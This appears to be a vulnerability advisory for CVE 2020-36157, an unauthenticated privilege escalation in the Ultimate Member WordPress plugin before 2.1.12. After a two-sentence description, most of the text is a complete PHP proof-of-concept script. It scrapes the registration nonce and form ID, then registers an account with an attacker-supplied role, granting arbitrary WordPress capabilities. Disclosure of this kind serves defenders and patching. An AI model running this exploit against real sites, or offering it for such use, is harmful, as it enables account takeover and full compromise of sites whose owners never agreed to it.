Ultimate Member < 2.1.12 – Unauthenticated Privilege Escalation via User Roles | CVE 2020-36157

Description

Due to the lack of filtering on the role parameter that could be supplied during the registration process, an attacker could supply the role parameter with a WordPress capability or any custom Ultimate Member role and effectively be granted those privileges.

Proof of Concept

<?php

// Settings
$wp_url = $argv[1];
$username = $argv[2];
$name = $argv[3];
$lastname = $argv[4];
$email = $argv[5];
$um_role = $argv[6];

// Pull the Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

preg_match('/_wpnonce"\svalue="([^"]+)"/', $content, $matches);
$nonce = $matches[1];

// Pull the form_id
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

preg_match('/id=\"form_id_([^"]+)"/', $content, $matches);
$form_id = $matches[1];

// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'user_login-' . $form_id => $username,
    'first_name-'. $form_id => $name,
    'last_name-' . $form_id => $lastname,
    'user_email-' . $form_id => $email,
    'user_password-' . $form_id => 'StrongPassword123!',
    'confirm_user_password-' . $form_id => 'StrongPassword123!',
    'role' => $um_role,
    'form_id' => $form_id,
    'timestamp' => '1603399250',
    'um_request' => '',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => 'register'

]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>